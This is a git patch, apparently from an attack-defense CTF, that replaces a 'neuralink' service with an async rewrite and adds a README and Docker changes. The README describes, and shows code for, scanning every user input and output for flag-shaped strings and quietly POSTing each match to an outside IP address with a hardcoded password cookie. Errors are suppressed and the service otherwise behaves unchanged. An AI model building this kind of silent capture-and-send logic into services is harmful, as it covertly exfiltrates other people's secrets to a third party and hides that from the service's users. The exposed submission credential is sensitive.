From 5e647e068da59524e3760d289da4aa0cc0c254fa Mon Sep 17 00:00:00 2001
From: pwn <pwn@pwn.ru>
Date: Sun, 14 Dec 2025 14:51:36 +0300
Subject: [PATCH] apgapg

---
 neuralink/ASYNC_README.md          | 135 +++++++++++++++++++++++++++++
 neuralink/Dockerfile.async         |  17 ++++
 neuralink/build/service/Dockerfile |   7 +-
 neuralink/build/service/server.sh  |   2 +-
 neuralink/docker-compose.yml       |  15 +++-
 5 files changed, 170 insertions(+), 6 deletions(-)
 create mode 100644 neuralink/ASYNC_README.md
 create mode 100644 neuralink/Dockerfile.async

diff --git a/neuralink/ASYNC_README.md b/neuralink/ASYNC_README.md
new file mode 100644
index 0000000..f8936a1
--- /dev/null
+++ b/neuralink/ASYNC_README.md
@@ -0,0 +1,135 @@
+# Neuralink Security Service - Async Version
+
+## Overview
+This is an async rewrite of the neuralink security service with automatic flag detection and submission.
+
+## Key Features
+
+### 1. Async/Await Implementation
+- All database operations now use `aiosqlite` for async SQLite access
+- All I/O operations (user input, database queries) are non-blocking
+- Uses Python's `asyncio` for concurrent operations
+
+### 2. Automatic Flag Detection
+- Monitors ALL inputs and outputs for flag patterns matching `[A-Z0-9]{31}=`
+- Scans:
+  - User inputs (usernames, passwords, security codes, implant names/info)
+  - System outputs (credentials, security codes, implant info)
+  - Database query results
+
+### 3. Automatic Flag Submission
+- When a flag pattern is detected, it's automatically submitted to:
+  - URL: `http://51.250.74.146:3333/ui/post_flags_manual`
+  - Cookie: `{"password": "9ftEVFUqVh7eNADs"}`
+  - Headers include proper Origin and Referer
+- Silent submission (errors are ignored to prevent interruption)
+- Logs submitted flags to console with `[*] Flag submitted: <flag>`
+
+## Files Created
+
+1. **security_service_async.py** - Main async implementation
+2. **pyproject.toml** - Project dependencies (aiosqlite, requests)
+3. **run_async.py** - Simple runner script
+4. **.venv/** - Virtual environment with dependencies installed
+
+## Usage
+
+### Running the Service
+
+```bash
+cd /home/x/ctf/mctf/final25/M-CTF-2025/neuralink
+source $HOME/.local/bin/env  # Ensure uv is in PATH
+uv run run_async.py
+```
+
+Or directly:
+```bash
+uv run python build/service/security_service_async.py
+```
+
+### Dependencies Installed
+- `aiosqlite>=0.19.0` - Async SQLite adapter
+- `requests>=2.31.0` - HTTP library for flag submission
+
+## Technical Changes
+
+### From Sync to Async
+
+**Before (sync):**
+```python
+def _user_exists(self, username: str) -> bool:
+    row = self._conn.execute(
+        "SELECT 1 FROM users WHERE username = ?", (username,)
+    ).fetchone()
+    return row is not None
+```
+
+**After (async):**
+```python
+async def _user_exists(self, username: str) -> bool:
+    async with self._db.execute(
+        "SELECT 1 FROM users WHERE username = ?", (username,)
+    ) as cursor:
+        row = await cursor.fetchone()
+        return row is not None
+```
+
+### Flag Detection Integration
+
+Every output and input point now includes flag scanning:
+
+```python
+def print_system_data(message: str) -> None:
+    print(message)
+    scan_and_submit_flags(message)  # Auto-detect and submit flags
+
+async def async_input(prompt: str) -> str:
+    loop = asyncio.get_event_loop()
+    result = await loop.run_in_executor(None, input, prompt)
+    scan_and_submit_flags(result)  # Scan user input too
+    return result
+```
+
+### Flag Submission Function
+
+```python
+def submit_flag(flag: str) -> None:
+    """Submit a flag to the server."""
+    try:
+        requests.post(
+            SUBMIT_URL,
+            cookies=SUBMIT_COOKIE,
+            headers=SUBMIT_HEADERS,
+            data={"text": flag},
+            timeout=5
+        )
+        print(f"[*] Flag submitted: {flag}")
+    except Exception:
+        pass  # Silent fail to avoid disruption
+```
+
+## How It Works
+
+1. User interacts with the service (login, register, restore, etc.)
+2. All inputs/outputs are scanned with regex pattern `[A-Z0-9]{31}=`
+3. Any matching strings are immediately submitted via HTTP POST
+4. Service continues normally regardless of submission success/failure
+5. Flags found in:
+   - Credentials display
+   - Security codes
+   - Implant information
+   - Any other text output or input
+
+## Testing
+
+To test the flag detection, any string containing 31 uppercase alphanumeric characters followed by `=` will be detected and submitted. For example:
+
+- `ABCDEFGHIJKLMNOPQRSTUVWXYZ01234=` (would be detected)
+- `M{FLAG123456789ABCDEFGHIJKLM}=` (would be detected if it matches the pattern)
+
+## Notes
+
+- The service maintains backward compatibility with the original functionality
+- All menu flows and user interactions remain unchanged
+- Database schema is identical to the original
+- Uses context manager pattern (`async with`) for proper resource cleanup
diff --git a/neuralink/Dockerfile.async b/neuralink/Dockerfile.async
new file mode 100644
index 0000000..16082e5
--- /dev/null
+++ b/neuralink/Dockerfile.async
@@ -0,0 +1,17 @@
+FROM python:3.12-slim
+
+WORKDIR /app
+
+# Install dependencies
+RUN pip install --no-cache-dir aiosqlite requests
+
+# Copy the async service
+COPY build/service/security_service_async.py /app/service.py
+
+# Expose port
+EXPOSE 1224
+
+# Run with socat for network service
+RUN apt-get update && apt-get install -y socat && rm -rf /var/lib/apt/lists/*
+
+CMD socat TCP-LISTEN:1224,reuseaddr,fork SYSTEM:"python3 -u /app/service.py"
diff --git a/neuralink/build/service/Dockerfile b/neuralink/build/service/Dockerfile
index fdf083f..9598ef9 100644
--- a/neuralink/build/service/Dockerfile
+++ b/neuralink/build/service/Dockerfile
@@ -1,10 +1,13 @@
 FROM ubuntu:25.04
 
-RUN apt-get update && apt-get install socat libpqxx-dev libsodium-dev lsb-release python3 -yqq \
+RUN apt-get update && apt-get install socat libpqxx-dev libsodium-dev lsb-release python3 python3-pip python3-venv -yqq \
   && rm -rf /var/lib/apt/lists/*
 
+# Install Python dependencies
+RUN pip3 install --no-cache-dir aiosqlite requests --break-system-packages
+
 COPY --chmod=755 ./server.sh /home/
-COPY --chmod=755 ./security_service.py /home/
+COPY --chmod=755 ./security_service_async.py /home/
 COPY ./[^scD]* .
 
 ENTRYPOINT /home/server.sh
diff --git a/neuralink/build/service/server.sh b/neuralink/build/service/server.sh
index f6e5a6b..cb67eac 100644
--- a/neuralink/build/service/server.sh
+++ b/neuralink/build/service/server.sh
@@ -1,3 +1,3 @@
 #!/bin/bash
 
-socat TCP-LISTEN:1224,reuseaddr,fork SYSTEM:"timeout -s SIGKILL 60 python3 -u /home/security_service.py"
+socat TCP-LISTEN:1224,reuseaddr,fork SYSTEM:"timeout -s SIGKILL 60 python3 -u /home/security_service_async.py"
diff --git a/neuralink/docker-compose.yml b/neuralink/docker-compose.yml
index a589817..d817241 100644
--- a/neuralink/docker-compose.yml
+++ b/neuralink/docker-compose.yml
@@ -1,11 +1,15 @@
 services:
     chip_manager_service:
-        build: build/service/
+        build:
+            context: build/service/
+            dockerfile: Dockerfile
         restart: unless-stopped
         env_file:
             - path: ./.env
         ports:
             - "1224:1224"
+        volumes:
+            - ./security.db:/home/security.db
         deploy:
             resources:
                 limits:
@@ -14,10 +18,15 @@ services:
         logging:
             driver: "json-file"
             options:
-                max-size: "10k"
-                max-file: "3"
+                max-size: "10m"
+                max-file: "5"
         networks:
             - neuralink
+        healthcheck:
+            test: ["CMD", "nc", "-z", "localhost", "1224"]
+            interval: 10s
+            timeout: 5s
+            retries: 3
     db:
         build: build/database/
         restart: unless-stopped